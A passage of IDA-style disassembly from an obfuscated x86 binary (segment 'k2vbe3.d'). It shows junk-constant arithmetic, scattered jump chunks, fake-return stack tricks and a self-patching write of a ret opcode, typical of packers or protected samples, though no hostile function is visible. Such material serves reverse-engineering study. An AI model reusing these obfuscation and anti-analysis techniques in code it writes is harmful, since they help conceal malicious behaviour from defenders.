		adc	ebx, ecx
		cdq
		sbb	ebx, eax
		jmp	loc_4403AD
; END OF FUNCTION CHUNK	FOR sub_44A79B

; =============== S U B	R O U T	I N E =======================================



sub_449661	proc near		; CODE XREF: sub_4440E5p
					; k2vbe3.d:loc_4465E1j

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CA7F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043EA3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441EE7 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00447D97 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044DDE0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00454E24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595B7 SIZE 00000005 BYTES

		xchg	esi, [esp+4+var_4]
		pop	esi
		pop	edx
		jb	loc_447D97
		mov	eax, [esp+0]
		push	edx
		call	sub_447BE9
		mov	eax, 11C9A2C5h
		jmp	loc_43EA3E
sub_449661	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44967F:				; CODE XREF: k2vbe3.d:0044446Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_449680:				; CODE XREF: sub_445541+16427j
		jmp	loc_43E09C
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------

loc_449685:				; CODE XREF: k2vbe3.d:004451E7j
		jl	loc_43C478

loc_44968B:				; CODE XREF: k2vbe3.d:loc_43DE88j
		mov	eax, [ebp-24h]
		mov	ecx, [eax+4]
		push	0CC7D0B40h
		pop	eax
		add	eax, 0F02D4673h
		jmp	loc_43E3B6

; =============== S U B	R O U T	I N E =======================================



sub_4496A2	proc near		; CODE XREF: k2vbe3.d:0044B929j
					; sub_449372+B8B5p

arg_4		= dword	ptr  8

		xchg	ecx, [esp+0]
		pop	ecx
		popf
		xchg	eax, [esp-8+arg_4]
		jmp	loc_4484B4
sub_4496A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_4496B0:				; CODE XREF: sub_457580:loc_458504j
		call	sub_43C04E
		test	al, al
		jz	loc_447F53
		jmp	loc_45B7E9
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------

loc_4496C2:				; DATA XREF: sub_444AE6+3o
		push	ecx
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4496C3:				; CODE XREF: sub_4424CF:loc_4419A3j
		mov	[ebp+var_1], 0
		mov	eax, cs
		xor	al, al
		or	eax, eax
		jmp	loc_452BA3
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		cmp	edx, 2099D315h
		jmp	loc_44A90B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4496DD:				; CODE XREF: sub_45A323-14AEj
		sub	ecx, 0EEF00A6Ah
		add	ecx, 518E7B18h
		sub	ecx, 0ECB6622Ch
		cmp	ecx, 814C5F73h
		jmp	loc_43E254
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4496FA:				; CODE XREF: k2vbe3.d:0044A451j
		mov	[ebx], eax
		rol	ebp, 6
		or	edx, 0BEF1F833h
		jmp	loc_44671E
; ---------------------------------------------------------------------------

loc_44970A:				; DATA XREF: sub_45616B-1854Bo
		xor	eax, 0DAB211A0h
		popf
		shl	eax, cl
		mov	edx, [ebp-1Ch]
		shr	edx, 3
		mov	ecx, ds:dword_43FA7C
		jmp	loc_45BC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_449724:				; CODE XREF: sub_4575BD-B26Bj
		sbb	edx, 0A56DA4E0h

loc_44972A:				; CODE XREF: sub_4575BD:loc_447E98j
		push	40AAC1A7h
		pop	eax
		xor	eax, 0F4134937h
		and	eax, 443B0E3Fh
		sub	eax, 5EFB3754h
		xor	eax, 276EB05Eh
		jmp	loc_4415E5
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_44974D:				; CODE XREF: sub_45B20A-19681j
		jge	sub_4570A3
		jz	loc_43EA23
		jle	loc_446A29

loc_44975F:				; CODE XREF: k2vbe3.d:loc_441670j
		xor	edx, 440195ADh
		add	edx, ebp
		add	edx, 39919F1Dh
		mov	edx, [edx]
		jmp	loc_43F931
; END OF FUNCTION CHUNK	FOR sub_45B20A

; =============== S U B	R O U T	I N E =======================================



sub_449774	proc near		; CODE XREF: sub_44B067p
					; k2vbe3.d:00451464j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DBB3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DED3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449D3A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044DE72 SIZE 0000000A BYTES

		pop	edx
		jno	loc_44DE72
		mov	eax, [esp-4+arg_0]
		call	sub_44FFD3

loc_449783:				; CODE XREF: sub_44A56B-30A2j
		jmp	loc_449D3A
sub_449774	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_449788	proc near		; DATA XREF: sub_45A323:loc_44AC8Eo

; FUNCTION CHUNK AT 00444A78 SIZE 00000005 BYTES

		push	edx
		push	offset loc_44B9D5
		jmp	loc_444A78
sub_449788	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_449793:				; CODE XREF: sub_4534C2-2AE4j
		pop	eax
		and	eax, 7837EEF8h
		add	eax, 5E444548h
		xor	eax, 69682CF1h
		call	sub_44F6FD

loc_4497AB:				; CODE XREF: sub_44FF97-E011j
		jmp	loc_445FF5
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_4497B0:				; CODE XREF: sub_43D45F+16j
		push	esi
		push	0C0D068ECh
		pop	esi
		add	esi, 0B3F7D282h
		rol	esi, 4
		or	esi, ds:4000EEh

loc_4497C6:				; CODE XREF: sub_44DD31:loc_45B691j
		and	esi, 5BDB81B3h
		jmp	loc_450938
; END OF FUNCTION CHUNK	FOR sub_43D45F

; =============== S U B	R O U T	I N E =======================================



sub_4497D1	proc near		; CODE XREF: k2vbe3.d:0044B9D0j
					; sub_4504F3+7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044625E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044EC37 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp+0]
		call	sub_445047
		jmp	loc_44625E
sub_4497D1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4497E2:				; CODE XREF: k2vbe3.d:loc_45AC50j
		adc	esi, 0E7648C4Dh
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_4497E8:				; CODE XREF: sub_45B20A:loc_45AC42j
		rol	esi, 9
		add	esi, 9475BF69h
		call	sub_4551AC

loc_4497F6:				; CODE XREF: k2vbe3.d:0044DC4Aj
		jmp	nullsub_414
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------

loc_4497FB:				; CODE XREF: k2vbe3.d:0044CE95j
		jmp	loc_455AA9
; ---------------------------------------------------------------------------

loc_449800:				; CODE XREF: k2vbe3.d:004454E4j
		jmp	loc_441B7A
; ---------------------------------------------------------------------------

loc_449805:				; CODE XREF: k2vbe3.d:00444DC5j
		jmp	locret_45BC8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426F8

loc_44980A:				; CODE XREF: sub_4426F8+3j
		jmp	loc_45874E
; END OF FUNCTION CHUNK	FOR sub_4426F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44980F:				; CODE XREF: sub_446E24-865Fj
		push	38D76940h
		pop	edx
		or	edx, 27DAA917h
		add	edx, 0C02016B0h

loc_449821:				; CODE XREF: k2vbe3.d:loc_44F06Fj
		popf
		and	ecx, edx

loc_449824:				; CODE XREF: k2vbe3.d:loc_44EE77j
		pop	edx
		jmp	loc_441592
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_44982A:				; CODE XREF: sub_444EFA:loc_44BDB1j
		pop	esi
		or	esi, 211A7B43h
		add	esi, 0CD400D69h
		sub	esi, 0D8F43A35h
		add	esi, 5E9B9275h
		jmp	loc_449DB5
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_449848:				; CODE XREF: sub_443E73:loc_43D22Ej
					; sub_443E73-6C39j
		add	esi, 90DF0E1Ch
		rol	esi, 10h
		add	esi, 72295783h
		xchg	esi, [esp+0]
		jmp	loc_447AFF
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------

locret_44985F:				; CODE XREF: k2vbe3.d:0044C71Bj
		retn
; ---------------------------------------------------------------------------

loc_449860:				; CODE XREF: k2vbe3.d:004448AEj
		jnb	loc_456AF9
		jbe	loc_44C270
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_44986C:				; CODE XREF: sub_45AD42-164B6j
		and	ecx, 580D74D7h
		or	ecx, 86DD81F6h
		jmp	loc_4519EE
; END OF FUNCTION CHUNK	FOR sub_45AD42

; =============== S U B	R O U T	I N E =======================================



sub_44987D	proc near		; CODE XREF: k2vbe3.d:00441062p
					; sub_450CBF:loc_44A743j ...

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		jmp	sub_43C04E
sub_44987D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_449889:				; CODE XREF: sub_456C15:loc_440032j
		or	eax, 769123CAh
		add	eax, 0A63E9AFBh
		xor	eax, 98724A01h

loc_44989B:				; CODE XREF: k2vbe3.d:loc_44CA6Dj
		test	eax, 4000000h

loc_4498A1:				; CODE XREF: sub_447E07:loc_447F8Ej
		jmp	loc_43C2DF
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4498A6:				; CODE XREF: sub_457D4B-1A1FFj
		sub	ebx, esi
		or	ebx, eax

loc_4498AA:				; CODE XREF: sub_457D4B:loc_4582BBj
		push	137E25B2h
		pop	eax
		add	eax, 0DB66EF9Eh
		or	eax, 4544839h
		jmp	loc_4524F2
; END OF FUNCTION CHUNK	FOR sub_457D4B

; =============== S U B	R O U T	I N E =======================================



sub_4498C1	proc near		; CODE XREF: sub_44D16B+1p
					; k2vbe3.d:loc_44F419j

; FUNCTION CHUNK AT 00457B8C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459281 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		cmp	eax, ecx
		shr	eax, 1
		sbb	eax, edx
		push	esi
		push	89357F70h
		jmp	loc_459281
sub_4498C1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_4498D7:				; CODE XREF: sub_44D9A7-C990j
		mov	eax, [ebp-4]
		push	eax
		push	edi
		call	sub_45985E

loc_4498E1:				; CODE XREF: k2vbe3.d:00448EC5j
		jmp	nullsub_205
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_4498E6:				; CODE XREF: sub_43DFE1-1625j
		jmp	loc_44C0F2
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_4498EB:				; CODE XREF: sub_445EB0:loc_443D59j
		push	0FC79A4D9h
		pop	edx
		sub	edx, 9527BADEh
		add	edx, 90F6599h
		rol	edx, 8
		add	edx, 9EF4F4B5h
		jmp	loc_44E17C
; END OF FUNCTION CHUNK	FOR sub_445EB0

; =============== S U B	R O U T	I N E =======================================



sub_44990B	proc near		; CODE XREF: k2vbe3.d:00448894j
					; sub_443FC1:loc_449D1Ap

; FUNCTION CHUNK AT 0043FB64 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, [ebp-8]
		push	eax
		jmp	loc_43FB64
sub_44990B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459D58

loc_449918:				; CODE XREF: sub_459D58:loc_454040j
		pop	esi
		sub	esi, 135796EFh
		xor	esi, 6AABBBAEh
		add	esi, 1AD8213Eh
		jmp	loc_44C3F8
; END OF FUNCTION CHUNK	FOR sub_459D58
; ---------------------------------------------------------------------------

loc_449930:				; CODE XREF: k2vbe3.d:loc_459DFFj
					; k2vbe3.d:00459E12j
		add	ecx, 41CA95FCh
		xchg	ecx, [esp]
		jmp	sub_453347
; ---------------------------------------------------------------------------
		mov	esp, ebp
		pop	ebp
		push	ds:dword_445628
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C002

loc_449948:				; CODE XREF: sub_45C002+13j
		jmp	loc_455E09
; END OF FUNCTION CHUNK	FOR sub_45C002
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44600A

loc_44994D:				; CODE XREF: sub_44600A-6ADCj
		jmp	sub_44367E
; END OF FUNCTION CHUNK	FOR sub_44600A
; ---------------------------------------------------------------------------

loc_449952:				; CODE XREF: k2vbe3.d:0044C909j
		push	5D2F3811h
		cdq
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_449958:				; CODE XREF: sub_43C3A9:loc_44D89Aj
		rol	ecx, 12h
		add	ecx, 5BF4E667h
		mov	[ecx], eax
		xchg	edi, [esp+0]
		mov	ecx, edi
		jmp	loc_442119
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44996D:				; CODE XREF: sub_447692:loc_44A9E2j
		pushf
		adc	ebx, 97EA6A7Bh
		jmp	loc_43EA8F
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
		mov	eax, 0EF9F7D01h
		call	sub_4553CC
		mov	ds:off_41E06C, eax
		lea	eax, sub_456767
		jmp	loc_4531AE
; ---------------------------------------------------------------------------

locret_449994:				; CODE XREF: k2vbe3.d:004536F6j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_449995	proc near		; CODE XREF: k2vbe3.d:00444C1Fj
					; k2vbe3.d:loc_44F4A4p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		mov	ecx, edx
		pop	edx
		xor	ecx, 6A9F4Bh
		add	ecx, 3B58DFBAh
		push	offset sub_44AD30
		jmp	locret_44D8F0
sub_449995	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4499B5:				; CODE XREF: sub_457D4B:loc_454AA1j
		sbb	esi, ecx
		jmp	loc_45BA94
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D81

loc_4499BC:				; CODE XREF: sub_452D81:loc_43C030j
		push	0BD9AF0D8h
		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp

loc_4499C7:				; CODE XREF: sub_444C8D+4j
		or	edx, 0B31AD8BBh
		and	edx, 640A704h
		jmp	loc_45987F
; END OF FUNCTION CHUNK	FOR sub_452D81
; ---------------------------------------------------------------------------
		mov	ds:off_41E1E8, eax
		lea	eax, sub_44D0D5
		mov	byte ptr [eax],	0C3h
		jmp	loc_448A17

; =============== S U B	R O U T	I N E =======================================



sub_4499EC	proc near		; CODE XREF: sub_4198C0+67p
					; k2vbe3.d:004410BFj
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043CA1A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043F5CF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004407EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410C5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442864 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F090 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F861 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00451080 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045913B SIZE 00000014 BYTES

		push	edi
		push	3168BE7Dh
		pop	edi
		jmp	loc_451080
sub_4499EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4499F8:				; CODE XREF: sub_43DA1E+BBD4j
		jno	loc_43E44F
		jg	loc_446449
		ror	ebp, 0Bh

loc_449A07:				; CODE XREF: sub_43DA1E:loc_44C93Aj
		push	2BB5CD5Bh
		jmp	loc_45BD6C
; END OF FUNCTION CHUNK	FOR sub_43DA1E

; =============== S U B	R O U T	I N E =======================================



sub_449A11	proc near		; CODE XREF: k2vbe3.d:0044085Ej
					; sub_445124+4p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00452065 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		push	offset loc_43EF43
		jmp	loc_452065
sub_449A11	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_449A22:				; CODE XREF: sub_44E90D:loc_454214j
		jnz	loc_4400D5

loc_449A28:				; CODE XREF: sub_43EEC6+842j
		jmp	loc_442CEC
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_449A2D:				; CODE XREF: sub_43F34C:loc_4534A2j
		mov	edi, 0EFBBE37Ah
		cdq
		jmp	loc_441D1B
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_449A38:				; CODE XREF: sub_43DFE1:loc_44A2BFj
		sub	ebx, 285CBB3Bh
		rol	ebx, 8
		add	ebx, 57DC72D9h
		and	ebx, 3FC4A1E8h
		xor	ebx, 711FA509h
		add	ebx, ebp
		jmp	loc_440327
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_449A5B:				; CODE XREF: sub_44B2D7:loc_44D52Cj
		xchg	eax, [esp+0Ch+var_C]
		jmp	loc_454517
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA0B

loc_449A64:				; CODE XREF: sub_45AA0B:loc_458AEBj
		push	offset sub_451222
		jmp	loc_4518CE
; END OF FUNCTION CHUNK	FOR sub_45AA0B

; =============== S U B	R O U T	I N E =======================================



sub_449A6E	proc near		; DATA XREF: k2vbe3.d:0044E9BCo

; FUNCTION CHUNK AT 0043CC45 SIZE 0000000B BYTES

		push	0DC94438Bh
		pop	eax
		add	eax, 8E3DFD76h
		rol	eax, 0Ch
		sub	eax, 0C4DD01Fh
		add	eax, 0F2AFE3DBh
		jmp	loc_43CC45
sub_449A6E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_449A8E:				; CODE XREF: sub_45B4EE:loc_45B482j
		pop	ecx
		and	ecx, 0D6A88F6Ah
		or	ecx, 6B2B5D5Dh
		rol	ecx, 1
		add	ecx, 28ED1262h
		xchg	ecx, [esp-8+arg_4]
		jmp	loc_455DF4
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_449AAB:				; CODE XREF: sub_44D2F1+3152j
		cmp	ebx, 74A4169Dh
		jmp	loc_44DA6A
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E3FD

loc_449AB6:				; CODE XREF: sub_43E3FD:loc_4595EDj
		jge	loc_456F01
		jns	loc_456890
		popf
		adc	edx, ecx
; END OF FUNCTION CHUNK	FOR sub_43E3FD
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_449AC5:				; CODE XREF: sub_44B94B:loc_43EF23j
		jmp	loc_456EFE
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		test	ebp, eax
		jmp	loc_451F03
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_449AD1:				; CODE XREF: sub_44B912+A391j
		rol	esi, 1Ch
		xor	esi, 9466E3ABh
		add	esi, ebp
		add	esi, 0ACB66B00h
		mov	esi, [esi]
		add	eax, esi
		push	offset sub_43D074
		jmp	loc_450EB7
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_449AF0:				; CODE XREF: k2vbe3.d:00443C9Ej
		pop	ebp
		pop	edx
		mov	eax, ds:dword_44DA2C
		or	eax, eax
		jmp	loc_454770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_449AFF:				; CODE XREF: sub_44C90E:loc_44D82Ej
		xchg	edx, [esp+0]
		call	sub_44C1BD
		cmp	dword ptr [ebp-8], 0
		jz	loc_452888
		jmp	loc_441B4F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_449B17:				; CODE XREF: k2vbe3.d:004488C8j
		jmp	loc_447A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_449B1C:				; CODE XREF: sub_45512F-EF47j
					; sub_45512F:loc_45565Dj
		mov	eax, 0CFF9C25h
		call	sub_44B15C

loc_449B26:				; CODE XREF: k2vbe3.d:00450BCAj
		jmp	loc_4485A0
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_449B2B:				; CODE XREF: sub_44B94B:loc_440CE5j
		jz	loc_44DE55
		jmp	loc_43C645
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		rol	ebx, 1Bh
		jmp	sub_45BA22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_449B3E:				; CODE XREF: sub_4443DD:loc_44229Cj
		sub	eax, 52C350E7h
		rol	eax, 17h
		add	eax, 5BBDE66Ch
		call	sub_4553CC
		push	edx
		push	0A87E67C4h
		pop	edx
		and	edx, 0F87A5D7Fh
		jmp	loc_450EC6
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_449B64:				; CODE XREF: sub_442F64+8BB8j
		ja	loc_447C51
		jmp	loc_4590AE
; END OF FUNCTION CHUNK	FOR sub_442F64
; ---------------------------------------------------------------------------

loc_449B6F:				; CODE XREF: k2vbe3.d:loc_44A9CBj
		push	0C7D12329h
		push	eax
		mov	eax, offset loc_453899
		jmp	loc_455025
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_256. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_449B80:				; CODE XREF: sub_457D4B+576j
		jmp	loc_43DB46
; END OF FUNCTION CHUNK	FOR sub_457D4B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_449B86:				; CODE XREF: sub_44A7C2-35A0j
		jmp	loc_449598
; END OF FUNCTION CHUNK	FOR sub_44A7C2

; =============== S U B	R O U T	I N E =======================================



sub_449B8B	proc near		; DATA XREF: sub_446CE6+F8B3o

; FUNCTION CHUNK AT 00446786 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044AFAC SIZE 00000005 BYTES

		push	eax
		ror	eax, 4
		push	edx
		push	0E4E2ABCAh
		pop	edx
		xor	edx, ds:4000F2h
		add	edx, 52DB58DAh
		mov	[edx], eax
		jmp	loc_44AFAC
sub_449B8B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_449BA9:				; CODE XREF: sub_444966+11793j
		mov	esi, [edx]
		test	edi, 51D64792h
		jmp	loc_45B32F
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------

loc_449BB6:				; CODE XREF: k2vbe3.d:loc_458CF2j
		mov	ebx, eax
		pop	eax
		xchg	edx, [esp]
		mov	eax, edx
		jmp	loc_445264
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E17C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	dl, ah
		imul	eax, [eax], 0
		xchg	eax, [esp]
		mov	edx, eax
		jmp	loc_43FCD7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_449BD9:				; CODE XREF: sub_45156D-D69Bj
		sbb	edi, esi
		xchg	ebx, [edi]
		pop	ebp
		jmp	loc_443A7E
; END OF FUNCTION CHUNK	FOR sub_45156D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_392. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_449BE4:				; CODE XREF: sub_4529E2-C261j
		jmp	loc_448583
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_449BE9:				; CODE XREF: sub_445124-5330j
					; sub_441172+12j
		jmp	loc_450A35
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------

loc_449BEE:				; CODE XREF: k2vbe3.d:0044F16Fj
		or	ebx, 6D0FD4Eh
		add	ebx, 0A06A9C03h
		xchg	ebx, [esp]
		jmp	sub_45B20A
; ---------------------------------------------------------------------------
		push	edi
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_449C03:				; CODE XREF: sub_4460FD:loc_447BF7j
		jmp	loc_44323C
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_449C08:				; CODE XREF: sub_44D298+3D3Fj
		mov	[ebp+0], eax

loc_449C0B:				; CODE XREF: sub_4424CF-1DEFj
					; sub_45A4C1-18793j ...
		mov	ecx, [ebp-14h]
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		jmp	loc_442D7F
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_449C1A:				; CODE XREF: sub_444B3E+22j
		jge	loc_44216E

loc_449C20:				; CODE XREF: sub_449A6E-CE23j
		jmp	loc_4407D1
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		xor	edx, 25803BFDh
		jmp	loc_442162
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_449C30:				; CODE XREF: sub_44C90E-75B1j
		add	eax, 71ACEF81h
		xor	eax, 0C7391B4Eh
		add	eax, 5B537DCh
		xor	eax, 20DE6343h
		jmp	loc_44E590
; END OF FUNCTION CHUNK	FOR sub_44C90E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_312. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_449C4E:				; CODE XREF: sub_4553CC:loc_446788j
		jz	loc_4550BB
		jmp	loc_43CCEF
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_449C59:				; CODE XREF: k2vbe3.d:00452B0Fj
		add	ecx, 8507395h
		call	sub_451719

loc_449C64:				; CODE XREF: k2vbe3.d:00445272j
		jmp	sub_44B2D7
; ---------------------------------------------------------------------------

locret_449C69:				; CODE XREF: k2vbe3.d:loc_43E80Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C564

loc_449C6A:				; CODE XREF: sub_44C564+10j
		push	0AEBAC134h
		pop	ecx
		rol	ecx, 7
		and	ecx, 4201CAEDh
		xor	ecx, 60008A45h
		test	ebx, ecx
		pop	ecx
		jmp	loc_454325
; END OF FUNCTION CHUNK	FOR sub_44C564
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_449C87:				; CODE XREF: sub_442C22+14145j
		test	ebp, 2A855E30h
		jmp	loc_43EA43
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_449C92:				; CODE XREF: sub_44EEFE:loc_44B71Aj
		xchg	ecx, [esp+4+var_4]
		jmp	sub_44F49C
